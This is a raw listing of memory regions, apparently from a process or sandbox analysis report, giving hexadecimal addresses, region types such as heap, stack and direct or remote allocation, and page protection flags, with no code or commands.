249E50B0000
heap
page read and write
23063A5B000
heap
page read and write
1F174F92000
heap
page read and write
1F1757F1000
heap
page read and write
1F174FBF000
heap
page read and write
23063EAD000
heap
page read and write
1F176880000
direct allocation
page read and write
7FFDA5B80000
unkown
page readonly
182B9580000
remote allocation
page read and write
908B3FF000
stack
page read and write
182B93A7000
heap
page read and write
1F17479F000
heap
page read and write
1F1748A2000
heap
page read and write
230643CD000
heap
page read and write
23064513000
heap
page read and write
19F57C90000
heap
page read and write
7FFD9428F000
unkown
page readonly
230639D4000
heap
page read and write
230642B8000
heap
page read and write
1F175804000
heap
page read and write
1F174E2B000
heap
page read and write
1F174CF1000
heap
page read and write
23063DCD000
heap
page read and write
1F172A3D000
heap
page read and write
230642D9000
heap
page read and write
23064346000
heap
page read and write
230642E0000
heap
page read and write
FB150FE000
stack
page read and write
23065E80000
direct allocation
page read and write
1F176870000
direct allocation
page read and write
23064445000
heap
page read and write
1F174793000
heap
page read and write
7FFDA3EB4000
unkown
page readonly
1F174E96000
heap
page read and write
230641F0000
heap
page read and write
23063ED0000
direct allocation
page read and write
23063EB3000
heap
page read and write
23065088000
heap
page read and write
1F174802000
heap
page read and write
7FFD941B2000
unkown
page read and write
23065E80000
direct allocation
page read and write
7FFDA3591000
unkown
page execute read
1F176850000
direct allocation
page read and write
1F176890000
direct allocation
page read and write
2039ABA7000
heap
page read and write
7FFD940E6000
unkown
page readonly
7FFDA4343000
unkown
page readonly
15425F04000
heap
page read and write
2039AB9A000
heap
page read and write
7FFDA463A000
unkown
page read and write
230639C3000
heap
page read and write
4EDC79C000
stack
page read and write
1F174FA6000
heap
page read and write
7FFDA3AF6000
unkown
page read and write
7FFDA0871000
unkown
page execute read
23065EB0000
direct allocation
page read and write
1F1747BE000
heap
page read and write
1F174C56000
heap
page read and write
1F174DCD000
heap
page read and write
1F1747AF000
heap
page read and write
230639C4000
heap
page read and write
2039AB9A000
heap
page read and write
7FFD941B3000
unkown
page write copy
65477DF000
stack
page read and write
1F17479F000
heap
page read and write
2039ABA8000
heap
page read and write
1F174914000
heap
page read and write
7FFDA5491000
unkown
page execute read
1F1744B8000
heap
page read and write
23064596000
heap
page read and write
230643E7000
heap
page read and write
2499F2B3000
heap
page read and write
7FF7B7310000
unkown
page readonly
1F17489D000
heap
page read and write
7FFD9DF81000
unkown
page execute read
2039ABA8000
heap
page read and write
1F175840000
heap
page read and write
7FFD93826000
unkown
page read and write
7FFDA3A82000
unkown
page readonly
1F1747E0000
heap
page read and write
1F174884000
heap
page read and write
1F174C54000
heap
page read and write
23063E1D000
heap
page read and write
7FF7B7311000
unkown
page execute read
23061FFB000
heap
page read and write
7FFDA4631000
unkown
page execute read
1F174A20000
direct allocation
page read and write
23063D6F000
heap
page read and write
15425F04000
heap
page read and write
1F175006000
heap
page read and write
23063E8C000
heap
page read and write
7FFDA3C10000
unkown
page readonly
7FF78F8EF000
unkown
page read and write
1F172A54000
heap
page read and write
23065E80000
direct allocation
page read and write
1F174E7F000
heap
page read and write
202CBD10000
heap
page read and write
1F176214000
direct allocation
page read and write
9407FF000
stack
page read and write
2039AB9D000
heap
page read and write
24082C00000
heap
page read and write
7FFDA4633000
unkown
page readonly
1F17476F000
heap
page read and write
23065EC0000
direct allocation
page read and write
23065E80000
direct allocation
page read and write
7FFDA54C0000
unkown
page readonly
23063A2D000
heap
page read and write
7FFDA3C03000
unkown
page readonly
1F174DEC000
heap
page read and write
1F1747EE000
heap
page read and write
1F174DF4000
heap
page read and write
23064416000
heap
page read and write
1BA29C10000
heap
page read and write
23063A35000
heap
page read and write
1F17442E000
heap
page read and write
230644C6000
heap
page read and write
1F172A47000
heap
page read and write
1F1744A4000
heap
page read and write
1F174DEC000
heap
page read and write
7FFDA3FD4000
unkown
page read and write
1FE243D0000
remote allocation
page read and write
1F176870000
direct allocation
page read and write
1F174E84000
heap
page read and write
1F174C75000
heap
page read and write
1F174C23000
heap
page read and write
7FFD94730000
unkown
page execute read
182B9660000
heap
page read and write
1695B430000
heap
page read and write
1F174F36000
heap
page read and write
1F17638C000
direct allocation
page read and write
1FE243B0000
heap
page read and write
1695B2B0000
heap
page read and write
23064228000
heap
page read and write
2499F280000
heap
page read and write
7FFDA3575000
unkown
page readonly
7FFDA57F8000
unkown
page readonly
1F17442A000
heap
page read and write
23063D96000
heap
page read and write
2499F273000
heap
page read and write
230643CB000
heap
page read and write
1F17449C000
heap
page read and write
2306202E000
heap
page read and write
7FFDA4DA0000
unkown
page readonly
1F175995000
heap
page read and write
23063D40000
heap
page read and write
7FFD93BBE000
unkown
page readonly
7FFDA5803000
unkown
page readonly
1F176880000
direct allocation
page read and write
23063E50000
heap
page read and write
230639A8000
heap
page read and write
DB7978C000
stack
page read and write
7FFD94494000
unkown
page readonly
2039AB9A000
heap
page read and write
2039AB9A000
heap
page read and write
7FFDA3711000
unkown
page readonly
1F17440F000
heap
page read and write
1A3991B1000
heap
page read and write
7FFD9F3C2000
unkown
page readonly
7FF78F8B0000
unkown
page readonly
15425F12000
heap
page read and write
1F1754D0000
direct allocation
page read and write
23063DF3000
heap
page read and write
1F17448B000
heap
page read and write
1F17482D000
heap
page read and write
1F17491D000
heap
page read and write
1F174F08000
heap
page read and write
2499F2CC000
heap
page read and write
7FFD93B11000
unkown
page execute read
1F174C8A000
heap
page read and write
F9F94FE000
stack
page read and write
23064350000
heap
page read and write
7FFDA3AEF000
unkown
page readonly
230643D4000
heap
page read and write
1F174EB7000
heap
page read and write
1FE2446F000
heap
page read and write
230659CC000
direct allocation
page read and write
1F174E3A000
heap
page read and write
23065071000
heap
page read and write
7FFD937E1000
unkown
page read and write
1BA29A10000
heap
page read and write
15425F04000
heap
page read and write
1F175857000
heap
page read and write
2039AB9F000
heap
page read and write
182B93B2000
heap
page read and write
7FFDA35F0000
unkown
page readonly
182B937F000
heap
page read and write
2B7C01A0000
heap
page read and write
7FFD9375B000
unkown
page read and write
23063E89000
heap
page read and write
1F1744DC000
heap
page read and write
1F172A3F000
heap
page read and write
7FFD948A5000
unkown
page readonly
7FFD9375A000
unkown
page write copy
781FAFE000
stack
page read and write
781FBFE000
stack
page read and write
1F174E09000
heap
page read and write
7FFD93814000
unkown
page read and write
23064F6F000
heap
page read and write
23065EA0000
direct allocation
page read and write
2306458B000
heap
page read and write
1F174D67000
heap
page read and write
908B2FE000
unkown
page read and write
23063D11000
heap
page read and write
23065EA0000
direct allocation
page read and write
23063D1C000
heap
page read and write
1F1747A2000
heap
page read and write
7FF78F8F3000
unkown
page readonly
23063DC1000
heap
page read and write
23064350000
heap
page read and write
2039AAB0000
heap
page readonly
1F174EC0000
heap
page read and write
23065EA0000
direct allocation
page read and write
15425F13000
heap
page read and write
1F174F7B000
heap
page read and write
1F174F20000
heap
page read and write
1F17448E000
heap
page read and write
1F174E42000
heap
page read and write
23064FBD000
heap
page read and write
1F17491C000
heap
page read and write
15425F11000
heap
page read and write
2306433D000
heap
page read and write
7FF7B7353000
unkown
page readonly
1F174842000
heap
page read and write
23063DCE000
heap
page read and write
23063A1F000
heap
page read and write
2039AB9A000
heap
page read and write
23064F69000
heap
page read and write
15425F04000
heap
page read and write
1F1748FF000
heap
page read and write
1A398FE0000
heap
page read and write
230644B3000
heap
page read and write
21A8A80E000
heap
page read and write
2499F230000
heap
page read and write
23064563000
heap
page read and write
1A399139000
heap
page read and write
1F174EEF000
heap
page read and write
7FF78F8DC000
unkown
page readonly
230645C2000
heap
page read and write
1F174C95000
heap
page read and write
230639EC000
heap
page read and write
2306455D000
heap
page read and write
1F174CF2000
heap
page read and write
2039AB9A000
heap
page read and write
1F174C35000
heap
page read and write
23064447000
heap
page read and write
7FFD9F3D1000
unkown
page execute read
23063A5F000
heap
page read and write
1F174CAF000
heap
page read and write
2306446C000
heap
page read and write
1F174842000
heap
page read and write
23063CF8000
heap
page read and write
1F1744B8000
heap
page read and write
1F174842000
heap
page read and write
15425F04000
heap
page read and write
1F1747C0000
heap
page read and write
23062006000
heap
page read and write
2499F258000
heap
page read and write
15425F11000
heap
page read and write
230644C5000
heap
page read and write
1F174CDF000
heap
page read and write
1F174C54000
heap
page read and write
1F1747DE000
heap
page read and write
1DEFE8A0000
heap
page read and write
2B7C0241000
heap
page read and write
1F1748F9000
heap
page read and write
1F174458000
heap
page read and write
1F174C7E000
heap
page read and write
2306451C000
heap
page read and write
1F174FA6000
heap
page read and write
230639FD000
heap
page read and write
1F1747F3000
heap
page read and write
1F1743E0000
heap
page read and write
1F175A5B000
heap
page read and write
15425F12000
heap
page read and write
1F174CE7000
heap
page read and write
23064533000
heap
page read and write
2306441D000
heap
page read and write
1F174E39000
heap
page read and write
23063CEE000
heap
page read and write
182B93A4000
heap
page read and write
9406FC000
stack
page read and write
230643B5000
heap
page read and write
1F1762E4000
direct allocation
page read and write
2306433F000
heap
page read and write
2039AB9D000
heap
page read and write
1F17445B000
heap
page read and write
15425F04000
heap
page read and write
1F1759D6000
heap
page read and write
12FF7FA8000
heap
page read and write
29686590000
heap
page read and write
1F1747FE000
heap
page read and write
2306202B000
heap
page read and write
1F17449C000
heap
page read and write
1D2C81A3000
heap
page read and write
7FFDA3590000
unkown
page readonly
7FFDA3660000
unkown
page readonly
1F174482000
heap
page read and write
1FE244A1000
heap
page read and write
1F533FC0000
heap
page read and write
23064341000
heap
page read and write
1F1748C7000
heap
page read and write
1F17487D000
heap
page read and write
1F176508000
heap
page read and write
1F174E96000
heap
page read and write
1F174D47000
heap
page read and write
7FFD94732000
unkown
page readonly
1F174FBF000
heap
page read and write
1F1747FE000
heap
page read and write
15425F12000
heap
page read and write
1F172A34000
heap
page read and write
1F17489A000
heap
page read and write
1F174885000
heap
page read and write
2306503C000
heap
page read and write
1F1744AA000
heap
page read and write
1F174787000
heap
page read and write
1F174DD9000
heap
page read and write
7FFDA3611000
unkown
page execute read
7FFD9DFB1000
unkown
page execute read
908AF2C000
stack
page read and write
7FFDA433F000
unkown
page readonly
23063DBC000
heap
page read and write
2920B457000
heap
page read and write
1F172A17000
heap
page read and write
1F1747B7000
heap
page read and write
23065EA0000
direct allocation
page read and write
7FFDA5493000
unkown
page readonly
2039AB9A000
heap
page read and write
23063A5A000
heap
page read and write
1F174482000
heap
page read and write
1F1758F1000
heap
page read and write
7FF7B733C000
unkown
page readonly
230643B5000
heap
page read and write
23063E98000
heap
page read and write
23064F41000
heap
page read and write
1F17489D000
heap
page read and write
1F174F98000
heap
page read and write
7FFDA35E2000
unkown
page readonly
7FFDA4341000
unkown
page read and write
230650C9000
heap
page read and write
7FFDA3540000
unkown
page readonly
230643D9000
heap
page read and write
7FFDA3EB1000
unkown
page execute read
230642C1000
heap
page read and write
1F174833000
heap
page read and write
230642FF000
heap
page read and write
23064340000
heap
page read and write
1F175853000
heap
page read and write
23061FBB000
heap
page read and write
1F17472D000
heap
page read and write
2306427B000
heap
page read and write
7FFD94769000
unkown
page readonly
2F3FAD09000
heap
page read and write
230642B0000
heap
page read and write
1D2C81A1000
heap
page read and write
230641FC000
heap
page read and write
23065EF0000
direct allocation
page read and write
23065E80000
direct allocation
page read and write
23064301000
heap
page read and write
1695B190000
heap
page read and write
23065EA0000
direct allocation
page read and write
23063E89000
heap
page read and write
7FFDA54B4000
unkown
page readonly
1F174919000
heap
page read and write
1F174FAD000
heap
page read and write
230642E8000
heap
page read and write
2499F180000
remote allocation
page read and write
1F174912000
heap
page read and write
1F174D68000
heap
page read and write
1F1744B8000
heap
page read and write
1F174E53000
heap
page read and write
1F172A36000
heap
page read and write
23063D79000
heap
page read and write
2039AB9A000
heap
page read and write
1F17447C000
heap
page read and write
7FFD94070000
unkown
page execute read
2306448C000
heap
page read and write
1F176870000
direct allocation
page read and write
23064EE0000
heap
page read and write
1F1747EE000
heap
page read and write
7FFDA3AF5000
unkown
page readonly
2F3FAD11000
heap
page read and write
7FFDA2E94000
unkown
page readonly
23064EC0000
heap
page read and write
2039AB9F000
heap
page read and write
1F174DF0000
heap
page read and write
1F17488E000
heap
page read and write
1A3991CB000
heap
page read and write
1F174E7F000
heap
page read and write
2039AB9A000
heap
page read and write
7FFD9DF59000
unkown
page readonly
1F17441F000
heap
page read and write
1F174C72000
heap
page read and write
15425F13000
heap
page read and write
23063FF0000
direct allocation
page read and write
23061F47000
heap
page read and write
23065EA0000
direct allocation
page read and write
1F172A36000
heap
page read and write
1F1758A7000
heap
page read and write
1F17501E000
heap
page read and write
7FF78F8F3000
unkown
page readonly
15425F04000
heap
page read and write
7FFDA2E91000
unkown
page execute read
2039ABA8000
heap
page read and write
23065090000
heap
page read and write
274CEF90000
heap
page read and write
1BA29C70000
heap
page read and write
2039AB93000
heap
page read and write
1F174F36000
heap
page read and write
7FFD9DF63000
unkown
page readonly
7FFDA5B8B000
unkown
page readonly
1F1748AD000
heap
page read and write
1F174C71000
heap
page read and write
1F17479F000
heap
page read and write
23063D0F000
heap
page read and write
23063E99000
heap
page read and write
1F174896000
heap
page read and write
1F172A63000
heap
page read and write
7FFDA3560000
unkown
page readonly
7FFD9398C000
unkown
page readonly
2306433D000
heap
page read and write
7FFD937EE000
unkown
page readonly
1F1744CD000
heap
page read and write
1F174D67000
heap
page read and write
7FFDA3EB0000
unkown
page readonly
2306432F000
heap
page read and write
1F1758C3000
heap
page read and write
230642BF000
heap
page read and write
1F17593B000
heap
page read and write
23063A5A000
heap
page read and write
15425F11000
heap
page read and write
2499F180000
remote allocation
page read and write
23063D83000
heap
page read and write
22924AE0000
heap
page read and write
7FFDA3651000
unkown
page execute read
2039ABA7000
heap
page read and write
2F3FACF7000
heap
page read and write
7FFDA3581000
unkown
page execute read
23063A72000
heap
page read and write
1F176840000
direct allocation
page read and write
1F174E1A000
heap
page read and write
15425F12000
heap
page read and write
23063875000
heap
page read and write
1F175854000
heap
page read and write
2306506A000
heap
page read and write
23064F41000
heap
page read and write
1F174E7F000
heap
page read and write
7FFD9428A000
unkown
page read and write
15425F04000
heap
page read and write
230645EA000
heap
page read and write
19F57900000
heap
page read and write
2039AB9A000
heap
page read and write
2306459A000
heap
page read and write
23064F6F000
heap
page read and write
1C7C7FF000
stack
page read and write
2039ABA8000
heap
page read and write
1F17479F000
heap
page read and write
1F1748BB000
heap
page read and write
1F176840000
direct allocation
page read and write
7FFDA35C4000
unkown
page readonly
3AA05FE000
stack
page read and write
1F1748BA000
heap
page read and write
1F176840000
direct allocation
page read and write
1F174C97000
heap
page read and write
23065EE0000
direct allocation
page read and write
2F3FAD1D000
heap
page read and write
2306433D000
heap
page read and write
23063A4B000
heap
page read and write
7FFDA367D000
unkown
page readonly
1F174E7F000
heap
page read and write
1D2C81B7000
heap
page read and write
23065EB0000
direct allocation
page read and write
7FFDA5B81000
unkown
page execute read
2039AB9A000
heap
page read and write
23063EC4000
heap
page read and write
23063E5C000
heap
page read and write
23063A53000
heap
page read and write
1F174F03000
heap
page read and write
15425F04000
heap
page read and write
23063D73000
heap
page read and write
2039AB9C000
heap
page read and write
7FFDA4630000
unkown
page readonly
2039ABA8000
heap
page read and write
AC15DC000
stack
page read and write
230640F0000
direct allocation
page read and write
7FFD94357000
unkown
page readonly
2039ABA8000
heap
page read and write
2306445B000
heap
page read and write
23064441000
heap
page read and write
23FA0C50000
heap
page read and write
1F174D28000
heap
page read and write
230643B5000
heap
page read and write
24082B31000
heap
page read and write
7FFDA5461000
unkown
page execute read
23064500000
heap
page read and write
1FE24487000
heap
page read and write
23065117000
heap
page read and write
12FF7F34000
heap
page read and write
2039ABA8000
heap
page read and write
23063A54000
heap
page read and write
1F174D47000
heap
page read and write
2F3FAC10000
heap
page read and write
23063EC5000
heap
page read and write
2F3FAF70000
heap
page read and write
2039AB9A000
heap
page read and write
23065EA0000
direct allocation
page read and write
7FFD9DF40000
unkown
page readonly
2306441B000
heap
page read and write
230645BD000
heap
page read and write
7FFD943E2000
unkown
page execute read
C9C30FF000
stack
page read and write
1A3991CB000
heap
page read and write
23064FE5000
heap
page read and write
1A399173000
heap
page read and write
7FFD943D2000
unkown
page execute read
2039ABA8000
heap
page read and write
1F174491000
heap
page read and write
23064FE5000
heap
page read and write
2306455D000
heap
page read and write
23064F41000
heap
page read and write
2039AB9A000
heap
page read and write
7FFDA0865000
unkown
page readonly
1F176501000
heap
page read and write
2C466860000
heap
page read and write
230639F3000
heap
page read and write
23063D82000
heap
page read and write
15425F12000
heap
page read and write
1F17474F000
heap
page read and write
7FFDA3EB0000
unkown
page readonly
1F176840000
direct allocation
page read and write
23063E31000
heap
page read and write
1F1743E1000
heap
page read and write
230645E7000
heap
page read and write
2499F24E000
heap
page read and write
1F175019000
heap
page read and write
23063EC0000
heap
page read and write
2039AB9A000
heap
page read and write
7FFDA3555000
unkown
page readonly
23064FC6000
heap
page read and write
21BEDD5000
stack
page read and write
1F174F0A000
heap
page read and write
1F174458000
heap
page read and write
23064447000
heap
page read and write
230645AE000
heap
page read and write
1F176840000
direct allocation
page read and write
7FFDA4339000
unkown
page readonly
1F175965000
heap
page read and write
1F174F80000
heap
page read and write
23063D63000
heap
page read and write
1F174470000
heap
page read and write
1F1747D7000
heap
page read and write
1F17488B000
heap
page read and write
23065E80000
direct allocation
page read and write
1F176507000
heap
page read and write
15425F12000
heap
page read and write
7FFD94846000
unkown
page read and write
2039AB98000
heap
page read and write
2039AB9A000
heap
page read and write
7FFD93AFA000
unkown
page read and write
2039AB9A000
heap
page read and write
1F534053000
heap
page read and write
1F174492000
heap
page read and write
7FFDA54C1000
unkown
page execute read
230639B8000
heap
page read and write
230642B3000
heap
page read and write
15425F12000
heap
page read and write
1F174772000
heap
page read and write
7FFD93CE1000
unkown
page readonly
23063A35000
heap
page read and write
1F174F0A000
heap
page read and write
23063E14000
heap
page read and write
15425F12000
heap
page read and write
1A399130000
heap
page read and write
2039AB9F000
heap
page read and write
15ED9580000
heap
page read and write
23062012000
heap
page read and write
1F17483F000
heap
page read and write
1F174CE1000
heap
page read and write
230644B3000
heap
page read and write
1F174729000
heap
page read and write
1F17483F000
heap
page read and write
7FFDA3A85000
unkown
page readonly
23064F8E000
heap
page read and write
23063E71000
heap
page read and write
2039AB9A000
heap
page read and write
2039ABA8000
heap
page read and write
1F17449A000
heap
page read and write
7FFDA3615000
unkown
page readonly
2920B620000
heap
page read and write
23065EB0000
direct allocation
page read and write
1F175812000
heap
page read and write
7FFD9E858000
unkown
page read and write
22B3B380000
heap
page read and write
1F174ECC000
heap
page read and write
7FFDA3691000
unkown
page execute read
7FFDA3AE0000
unkown
page readonly
23064237000
heap
page read and write
230643D5000
heap
page read and write
7FFDA4173000
unkown
page readonly
2039ABA8000
heap
page read and write
2039AB9A000
heap
page read and write
15425F04000
heap
page read and write
22B3B4A0000
heap
page read and write
92D079F000
stack
page read and write
2039AB9A000
heap
page read and write
1F174498000
heap
page read and write
1F174E62000
heap
page read and write
23065EC0000
direct allocation
page read and write
7FFDA4161000
unkown
page execute read
7FFDA3C39000
unkown
page readonly
15425F12000
heap
page read and write
1F174885000
heap
page read and write
2C466890000
heap
page read and write
23063A61000
heap
page read and write
182B937C000
heap
page read and write
23065E80000
direct allocation
page read and write
1F17474D000
heap
page read and write
1DEFE870000
heap
page read and write
7FFDA3AE5000
unkown
page readonly
23063D0E000
heap
page read and write
1F17447B000
heap
page read and write
15425F11000
heap
page read and write
23063E33000
heap
page read and write
1F174849000
heap
page read and write
1F172960000
direct allocation
page read and write
249E4FB0000
heap
page read and write
230642A4000
heap
page read and write
230650AA000
heap
page read and write
1D2C81A7000
heap
page read and write
1F17442E000
heap
page read and write
1F175AAA000
heap
page read and write
23063E50000
heap
page read and write
1F17449D000
heap
page read and write
1F174C4F000
heap
page read and write
1F174882000
heap
page read and write
7FFD93496000
unkown
page readonly
15425F04000
heap
page read and write
23063E19000
heap
page read and write
F9F96FE000
stack
page read and write
15425F04000
heap
page read and write
182B93A7000
heap
page read and write
1F175900000
heap
page read and write
7FFD937DE000
unkown
page read and write
1F1748AD000
heap
page read and write
1F174E3A000
heap
page read and write
7FFD94835000
unkown
page write copy
1F174843000
heap
page read and write
23063E88000
heap
page read and write
23063A1C000
heap
page read and write
2039AB99000
heap
page read and write
182B93A7000
heap
page read and write
2306450A000
heap
page read and write
23064F5D000
heap
page read and write
1F176840000
direct allocation
page read and write
182B93A7000
heap
page read and write
2039AB9A000
heap
page read and write
1F174D47000
heap
page read and write
1F17440E000
heap
page read and write
23062018000
heap
page read and write
2039ABA8000
heap
page read and write
1F174ECE000
heap
page read and write
1F172A49000
heap
page read and write
1F174F81000
heap
page read and write
230643BD000
heap
page read and write
7FFD934A0000
unkown
page readonly
1F1747E8000
heap
page read and write
23063E0C000
heap
page read and write
23062011000
heap
page read and write
230639A3000
heap
page read and write
26B482F0000
heap
page read and write
2039AB9A000
heap
page read and write
2306433F000
heap
page read and write
1F174460000
heap
page read and write
1F1769B0000
direct allocation
page read and write
2A697EC000
stack
page read and write
7FFDA4331000
unkown
page execute read
15425F04000
heap
page read and write
2306202B000
heap
page read and write
1F17479E000
heap
page read and write
1F1763C8000
direct allocation
page read and write
1F174DCC000
heap
page read and write
15425F11000
heap
page read and write
2306440C000
heap
page read and write
2306434C000
heap
page read and write
230642C8000
heap
page read and write
2039AB9A000
heap
page read and write
1F17448C000
heap
page read and write
1F174CE1000
heap
page read and write
7FFDA57F1000
unkown
page execute read
1F174E3A000
heap
page read and write
23063EB8000
heap
page read and write
23065EC0000
direct allocation
page read and write
7FFD94871000
unkown
page write copy
15425F04000
heap
page read and write
7FFD943AF000
unkown
page readonly
24082A40000
heap
page read and write
23065044000
heap
page read and write
26B48160000
heap
page read and write
2039AB9A000
heap
page read and write
230645C7000
heap
page read and write
1F174E7F000
heap
page read and write
1F17474E000
heap
page read and write
1BA29C45000
heap
page read and write
2039ABA7000
heap
page read and write
2039AB9A000
heap
page read and write
23063D3D000
heap
page read and write
7FFDA35F6000
unkown
page readonly
249E50E0000
heap
page read and write
2306505E000
heap
page read and write
1D2C81D1000
heap
page read and write
23063E05000
heap
page read and write
23063DC1000
heap
page read and write
23061F30000
heap
page read and write
230639D4000
heap
page read and write
2039ABA8000
heap
page read and write
7FFD9DF9C000
unkown
page readonly
15425F04000
heap
page read and write
1F1747A7000
heap
page read and write
1F1729FC000
heap
page read and write
23061F4D000
heap
page read and write
23063DB9000
heap
page read and write
230642D9000
heap
page read and write
230642C6000
heap
page read and write
15425F04000
heap
page read and write
1F1759CF000
heap
page read and write
230642E8000
heap
page read and write
1F17489D000
heap
page read and write
1F174D13000
heap
page read and write
2039AB9A000
heap
page read and write
230650D8000
heap
page read and write
1FE244A1000
heap
page read and write
1F174E97000
heap
page read and write
7FFD94302000
unkown
page readonly
1D2C8158000
heap
page read and write
1F1761D8000
direct allocation
page read and write
7FFD9DFE1000
unkown
page readonly
7FF78F8DC000
unkown
page readonly
15425F12000
heap
page read and write
1F1742E0000
direct allocation
page read and write
23063DC1000
heap
page read and write
7FFD9F3B1000
unkown
page execute read
7FFD939A1000
unkown
page execute read
1F176870000
direct allocation
page read and write
7FFDA5809000
unkown
page readonly
1D2C81EB000
heap
page read and write
23064293000
heap
page read and write
2039ABA8000
heap
page read and write
7FFDA35ED000
unkown
page readonly
1F174CF1000
heap
page read and write
2306505B000
heap
page read and write
23064F5D000
heap
page read and write
182B9460000
heap
page read and write
23064F44000
heap
page read and write
23063D0F000
heap
page read and write
230642E3000
heap
page read and write
23063E04000
heap
page read and write
2039ABA8000
heap
page read and write
2039ABA6000
heap
page read and write
7FFDA3AF9000
unkown
page read and write
7FFDA3A94000
unkown
page read and write
7FFDA3A90000
unkown
page readonly
7FFDA4DA4000
unkown
page readonly
23062019000
heap
page read and write
7FF78F8B0000
unkown
page readonly
248D03AD000
heap
page read and write
1F534091000
heap
page read and write
230642F7000
heap
page read and write
1F174ED1000
heap
page read and write
1F17478F000
heap
page read and write
1F174D12000
heap
page read and write
1F174C3F000
heap
page read and write
7FFD9DF46000
unkown
page readonly
23064CB0000
direct allocation
page read and write
1F174C54000
heap
page read and write
7FFD9DFEC000
unkown
page readonly
23063D49000
heap
page read and write
1F1744B9000
heap
page read and write
7FFDA4175000
unkown
page readonly
1FE24439000
heap
page read and write
182B937E000
heap
page read and write
1F17586C000
heap
page read and write
2306445B000
heap
page read and write
1D2C8192000
heap
page read and write
7FFDA4DA6000
unkown
page readonly
1F1748AD000
heap
page read and write
23062019000
heap
page read and write
1F17477E000
heap
page read and write
7FFDA3545000
unkown
page read and write
1F174CAD000
heap
page read and write
23063A4B000
heap
page read and write
23065E80000
direct allocation
page read and write
23065EC0000
direct allocation
page read and write
1F172A57000
heap
page read and write
15425F12000
heap
page read and write
1F174D47000
heap
page read and write
182B93E5000
heap
page read and write
1F174CE0000
heap
page read and write
15425F04000
heap
page read and write
23065EA0000
direct allocation
page read and write
1F174885000
heap
page read and write
1F1728E0000
heap
page readonly
7FFDA5808000
unkown
page read and write
1F174443000
heap
page read and write
15425F04000
heap
page read and write
2039ABA7000
heap
page read and write
15425F04000
heap
page read and write
7FFD9434E000
unkown
page readonly
7FFD9DFC2000
unkown
page readonly
1F176870000
direct allocation
page read and write
23FA0CED000
heap
page read and write
1F1744B6000
heap
page read and write
202CBDB0000
heap
page read and write
23063EC1000
heap
page read and write
23063D36000
heap
page read and write
15425F04000
heap
page read and write
15425F04000
heap
page read and write
7FFD947FF000
unkown
page write copy
1F174460000
heap
page read and write
2499F060000
heap
page read and write
23FA0CC5000
heap
page read and write
B541D9B000
stack
page read and write
92D01CE000
stack
page read and write
23063A53000
heap
page read and write
230642AB000
heap
page read and write
1F17476D000
heap
page read and write
1DEFE770000
heap
page read and write
E648D8B000
stack
page read and write
1F174C3F000
heap
page read and write
23063A5A000
heap
page read and write
23064F33000
heap
page read and write
7FFD943C1000
unkown
page execute read
182B93E5000
heap
page read and write
7FFD94834000
unkown
page read and write
23063E2C000
heap
page read and write
182B93BB000
heap
page read and write
7FFDA54B0000
unkown
page readonly
1F1747B7000
heap
page read and write
1F174721000
heap
page read and write
2039AB9A000
heap
page read and write
23061FEF000
heap
page read and write
1F176840000
direct allocation
page read and write
23063CEF000
heap
page read and write
1F174ED1000
heap
page read and write
1F176870000
direct allocation
page read and write
23065063000
heap
page read and write
3AA018D000
stack
page read and write
7FFD9DF41000
unkown
page execute read
1D2C81D1000
heap
page read and write
2039AB9F000
heap
page read and write
7FF7B7351000
unkown
page read and write
23065994000
direct allocation
page read and write
23064F30000
heap
page read and write
7FFD9F3B6000
unkown
page readonly
7FFDA5460000
unkown
page readonly
19F57AB0000
heap
page read and write
1F172A31000
heap
page read and write
1F1758F0000
heap
page read and write
15ED9448000
heap
page read and write
1F1758D0000
heap
page read and write
23063E53000
heap
page read and write
24082A60000
heap
page read and write
2499F4E0000
heap
page read and write
1F174E77000
heap
page read and write
23063DCD000
heap
page read and write
23063ECD000
heap
page read and write
1F174911000
heap
page read and write
1F1747E7000
heap
page read and write
2039ABA7000
heap
page read and write
2039ABA7000
heap
page read and write
2306441C000
heap
page read and write
7FFD9470A000
unkown
page read and write
2039AB9F000
heap
page read and write
1F174FAD000
heap
page read and write
2039AB8F000
heap
page read and write
2039AB9F000
heap
page read and write
7FFD9F3C0000
unkown
page readonly
23064566000
heap
page read and write
1F176354000
direct allocation
page read and write
1F174F88000
heap
page read and write
23063D0E000
heap
page read and write
1F175A16000
heap
page read and write
15425F04000
heap
page read and write
7FFD944B6000
unkown
page readonly
15425F04000
heap
page read and write
1F1768A0000
direct allocation
page read and write
1F17488E000
heap
page read and write
2920B410000
heap
page read and write
2039ABA7000
heap
page read and write
23063D86000
heap
page read and write
2306451C000
heap
page read and write
1F174E0E000
heap
page read and write
23064F69000
heap
page read and write
7FFDA35E6000
unkown
page readonly
23065EB0000
direct allocation
page read and write
1F1744D2000
heap
page read and write
1F174826000
heap
page read and write
1F1747AF000
heap
page read and write
7FFD9DF45000
unkown
page read and write
2039AB9A000
heap
page read and write
182B93A2000
heap
page read and write
7FFD931E1000
unkown
page execute read
1F172A4D000
heap
page read and write
23063A78000
heap
page read and write
19F57C95000
heap
page read and write
23063EA5000
heap
page read and write
1F175A16000
heap
page read and write
1F174D1C000
heap
page read and write
1A3991CB000
heap
page read and write
7FFDA2E90000
unkown
page readonly
1F176870000
direct allocation
page read and write
1F176870000
direct allocation
page read and write
23063EC6000
heap
page read and write
7FFDA2EA5000
unkown
page readonly
23065E80000
direct allocation
page read and write
1F174F03000
heap
page read and write
23063A1D000
heap
page read and write
15425F12000
heap
page read and write
7FFDA3550000
unkown
page readonly
7FFD9DFE8000
unkown
page read and write
1F17446F000
heap
page read and write
1F176850000
direct allocation
page read and write
1F174802000
heap
page read and write
7FFDA3300000
unkown
page readonly
7FFDA463B000
unkown
page readonly
7FFD9DFD1000
unkown
page execute read
7FFDA4165000
unkown
page readonly
23063D05000
heap
page read and write
54EFEFE000
stack
page read and write
7FFDA3BFE000
unkown
page readonly
23064AA0000
direct allocation
page read and write
1F174E7F000
heap
page read and write
23063A0F000
heap
page read and write
1F1769C4000
direct allocation
page read and write
23063A5B000
heap
page read and write
7FFD938A1000
unkown
page execute read
7FFD9DFBD000
unkown
page readonly
7FFDA35C0000
unkown
page readonly
2306511E000
heap
page read and write
15425F04000
heap
page read and write
1F17449C000
heap
page read and write
1F1748BA000
heap
page read and write
1F1768B0000
direct allocation
page read and write
7FFD9F7F4000
unkown
page readonly
2306202B000
heap
page read and write
1F17489D000
heap
page read and write
1F174421000
heap
page read and write
7FFD93815000
unkown
page write copy
1F174DCC000
heap
page read and write
230639D4000
heap
page read and write
23064228000
heap
page read and write
23063E5C000
heap
page read and write
1F175001000
heap
page read and write
23064500000
heap
page read and write
1F174889000
heap
page read and write
1F174E47000
heap
page read and write
15425F04000
heap
page read and write
